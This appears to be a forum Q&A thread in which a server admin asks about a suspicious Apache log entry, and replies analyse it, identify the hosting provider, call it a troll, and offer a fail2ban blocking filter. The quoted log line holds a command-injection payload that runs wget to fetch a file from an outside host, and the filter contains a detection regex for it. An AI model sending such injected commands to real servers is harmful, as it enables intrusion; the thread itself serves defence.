# Apache logs, suspicious logging apach0day

Tags: apache

today I received this

```
16X.XXX.XX.77 - - [28/Jul/2014:--:--:--] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 3596 "-" "chroot-apach0day"
```

so with

```
HTTP_USER_AGENT: chroot-apach0day
REQUEST_URI: x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day
```

appears in access log and seems suspicious...
any idea about that?

Comment: This is someone attempting to hack your server. Someone attempting to hack your server, if it is open to the internet, is a normal state of affairs. It does not mean the attack was successful (though it also doesn't mean it was unsuccessful).

Comment: yeah, I know, someone trying to hack ... but the question is what, is really new (this kind of attempt) for me and I don't know what the hell is trying to get & how

Comment: Do you have the log IO and the run time for the attack? If the output file size is larger than normal index page, and the timing takes longer than 1s, probably something got executed on server side and the output is returned to the hacker. Can anyone verify this?

Comment: It would also be helpful if you have egress logging to check if there is any outgoing traffic to proxypipe IP `31.220.14.3`.

Answer (score 3):

Proxypipe.com is hosted by Voxility S.R.L (AS39743)(AS3223). Voxility is known to be a bad hosting company by allowing the hosting of malware, sending spam, executing DDoS et cetera, from their IP's.

It is best to block all their IP ranges otherwise you will possibly be dealing with DDoS attacks. I experienced this all day long before.

You can find a list of their IP ranges here [Voxility (AS39743)](http://bgp.he.net/AS39743#_prefixes) and [Voxility (AS3223)](http://bgp.he.net/AS3223#_prefixes)

Comment: Also if you do a Google search for "proxypipe.com" you will see that other admins are getting these hits too. See [https://encrypted.google.com/search?num=100&site=&source=hp&q=proxypipe.com&oq=proxypipe.com&gs_l=hp.13..0.1763.95983.0.97099.8.7.0.1.1.0.121.566.6j1.7.0....0...1c.1j2.49.hp..1.7.448.0.YaY1SZGzRaA](https://encrypted.google.com/search?num=100&site=&source=hp&q=proxypipe.com&oq=proxypipe.com&gs_l=hp.13..0.1763.95983.0.97099.8.7.0.1.1.0.121.566.6j1.7.0....0...1c.1j2.49.hp..1.7.448.0.YaY1SZGzRaA)

Comment: Just a update: The Apache 0day is not any kind of zero day bug it was just some troll trying to scare admins. More info [here](http://blog.erratasec.com/2014/08/that-apache-0day-was-troll.html) and [http://bighacks.net/chroot-apch0day-apache-exploit-explained/](http://bighacks.net/chroot-apch0day-apache-exploit-explained)

Answer (score 1):

I too got similar probes. However, I got three different probes, all with different payloads. Running ls -a showed a new directory called .ssh in my document root, with a file called notshell.php

I immediately deleted the directory and destroyed the DigitalOcean instance

My guess is that somebody is trying to create some kind of attack on servers

Answer (score 0):

Here's a quick-and-dirty solution to block using fail2ban. (If you don't currently use fail2ban, google for your OS.)

If you have fail2ban installed, see below. Note locations of the fail2ban files might be different, depending on your OS. The example below is from a Debian server. This sample doesn't cover ban times, etc.---just how to create a filter and add it to jail.local. There are plenty of fail2ban config examples on google for multiple systems.

Quick-And-Dirty (Debian Linux):

1) Create a new file apache-0day.conf in /etc/fail2ban/filter.d that contains:

`#`Fail2Ban configuration file
`#`Limited filter to stop apach0day attacks

[Definition]
Option: failregex
`#`Notes.: regex to match this kind of request:
`#`162.253.66.77 - - [28/Jul/2014:19:02:00 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 359 "-" "chroot-apach0day"

failregex = ^ -."(GET|POST).\?.proxypipe|apach0day.$
Option: ignoreregex
Notes.: regex to ignore. If this regex matches, the line is ignored.

Values: TEXT

`#`ignoreregex =

2) Test filter with command: fail2ban-regex /var/log/apache2/access.log /etc/fail2ban/filter.d/apache-0day.conf

3) Edit /etc/fail2banl/jail.local, to add this jail:

[apache-0day]
enabled = true
port = http,https
filter = apache-0day
logpath = /var/log/apache*/*access.log
maxretry = 2

4) Test the new overall configuration (watch for WARNING and fix, if needed): fail2ban-client -d

5) Re-start fail2ban: /etc/init.d/fail2ban restart

Comment: Nice solution, but this will only block clients after they have tried (successfully or not) to use this vulnerability. If you want a proactive, rather reactive approach, you have to rely on snort/suricata or apache modsecurity.